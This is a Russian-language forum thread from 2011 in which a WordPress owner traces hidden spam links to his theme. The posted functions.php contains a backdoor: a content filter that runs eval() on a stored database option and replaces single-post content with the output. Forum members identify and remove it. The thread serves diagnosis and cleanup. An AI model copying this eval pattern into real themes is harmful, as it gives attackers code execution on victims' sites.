Перейти к содержимому

Реферальная программа Мегаплана

Выбрать шаблон и создать сайт

Вредоносный код

#1 anpleshivcev

anpleshivcev
  • Пользователь
  • 18 сообщений
  • Репутация: 0
0

Отправлено 20 Ноябрь 2011 - 23:20

Недавно, проверяя сайт на ссылки, обнаружил на некоторых страницах скрытые ссылки с анкором в виде точки. Причем, ссылки видно только незарегистрированным пользователям, поэтому я раньше их не замечал. Вот одна из таких страниц. 7 абзац, точка после первого предложения. Подскажите, пожалуйста, кто знает...

 

 

  • 0

#2 Genesis

Genesis
  • Пользователь
  • 419 сообщений
  • Репутация: 27

Отправлено 20 Ноябрь 2011 - 23:57

Мда хитро придумано. Факт взлома на лицо. Бекапов естественно близких нет? Не спец совсем в этом, но по логике для начала нужно определить каким образом внедрен код. Если скриптом, что скорее всего, тут я точно не помощник. А если вручную, то нужно повышать безопасность. Для начала откат на бекап, а дальше книжку в зубы. Посчитайте внешние ссылки и удалите их. Если работает скрипт внедренный они вернутся может не в том кол-ве и не в тех статьях, но вернутся. Для безопасности что сделано вообще? Хостеру о взломе также сообщите.


  • 0

#3 anpleshivcev

anpleshivcev
    Topic Starter
  • Пользователь
  • 18 сообщений
  • Репутация: 0

Отправлено 21 Ноябрь 2011 - 13:50

Бекапы есть, но и в них то же самое. Я не знаю насколько давно это было сделано. А как определить каим образом был внедрен код? Если вручную, то как я понимаю, ссылка должна крыться в файле именно этой статьи, тогда вопрос: какой файл в вордпресс отвечает именно за содержимое статей. А если скрипт, то он тоже ведь должен быть внедрен в код, а значит и найти его можно. Только я не знаю, как он должен выглядеть и где более вероятней находиться. Хостер сообщил, что взлом произведен не через них, а через FTP. FTP заблокировал, пароль на хосте и сайте поменял - появились новые ссылки. Кто знает, что делать?
  • 0

#4 Maverick

Maverick
  • Модератор
  • 87 сообщений
  • Репутация: 11

Отправлено 23 Ноябрь 2011 - 21:40

Если ссылки добавлены вручную, то сразу ясно что взломали либо админку wordpress, либо доступ phpmyadmin.
Если ссылки добавляются скриптом, то скрипт скорее всего находится в functions.php или single.php - эти файлы лежат в папке с темой сайта
если не ошибаюсь то - /wp-content/themes/название-темы/
Но также есть вариант что добавляются через JS скрипт.
Однозначно надо смотреть те файлы и проверять есть ли лишний код.
  • 0

#5 anpleshivcev

anpleshivcev
    Topic Starter
  • Пользователь
  • 18 сообщений
  • Репутация: 0

Отправлено 25 Ноябрь 2011 - 09:28

Смотрел - ничего не нашел. Может кто подскажет?
Вот код functions.php:

<?php


add_filter('the_content', '_bloginfo', 100);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
if ( function_exists('register_sidebars') )
register_sidebars(2,array(
'before_widget' => '<div id="%1$s" class="wp-widget %2$s">',
'after_widget' => '</div>',
'before_title' => '<div class="wp-widget-title">',
'after_title' => '</div>',
));

function widget_mytheme_search() {
?>
<div class="search-widget-title">Как сделать</div>
<div class="search-widget">
<form method="get" id="searchform" action="<?php bloginfo('home'); ?>/">
<input type="text" name="s" id="s" value="Поиск" onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;"/>
</form>
</div>
<?php
}
if ( function_exists('register_sidebar_widget') )
register_sidebar_widget(__('Search'), 'widget_mytheme_search');
?>


Вот single.php:
<?php get_header(); ?>

<?php include(TEMPLATEPATH."/left.php");?>
<?php include(TEMPLATEPATH."/right.php");?>
<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
<div class="center-widget-title"></div>
<div class="center-widget">
<div id="post-<?php the_ID(); ?>">

<h1 class="post-title">
<?php the_title(); ?>
</h1>

<p class="postmeta">
<!-- <span class="post-date"><?php the_time('j M, Y') ?></span>&nbsp; -->
<span class="post-filed"><?php the_category(', ') ?></span>
<?php edit_post_link(__('Править'), ' · ', ''); ?>
</p>

<div class="post-content">
<?php the_content('<p class="serif">' . 'Continue Reading...' . '</p>'); ?>

</div> <!-- Post Content -->

<?php link_pages('<p><strong>' . 'Страницы' . ':</strong> ', '</p>', ''); ?>

</div> <!-- post-id -->
</div> <!-- center-widget -->

<?php comments_template(); ?>

<?php endwhile; else: ?>
<div class="center-widget-title"></div>
<div class="center-widget">
<h2>Error 404 - Страница не найдена.</h2>
<p>Извините, но того что Вы искали здесь нет.</p>
</div> <!-- center-widget -->
<?php endif; ?>
<?php get_footer(); ?>

А если добавили вручную, то как они сделали так, чтобы ссылка была видна только незарегистрированному пользователю?


  • 0

#6 Maverick

Maverick
  • Модератор
  • 87 сообщений
  • Репутация: 11

Отправлено 25 Ноябрь 2011 - 15:41

anpleshivcev, попробуйте удалить следующий код и посмотреть.

add_filter('the_content', '_bloginfo', 100);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}

  • 0

#7 anpleshivcev

anpleshivcev
    Topic Starter
  • Пользователь
  • 18 сообщений
  • Репутация: 0

Отправлено 25 Ноябрь 2011 - 18:15

Спасибо большое! Помогло! Но этот код был изначально в functions.php этой темы. Это получается, что я ее скачал с сайта уже с кодом?
И еще вопрос: что этот код именно делает? После его удаления пароль в админке надо менять?


  • 0

#8 Maverick

Maverick
  • Модератор
  • 87 сообщений
  • Репутация: 11

Отправлено 25 Ноябрь 2011 - 20:35

anpleshivcev, Да, тему вы скачали уже с данным кодом. Пароль желательно сменить для профилактики. Этот код подключает скрипт с другого сайта, в данном случает скрипт безобидный и выводит только ссылку, но ведь мог бы и вирус цеплять на сайт. ;)
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Оформление форума – IPBSkins.ru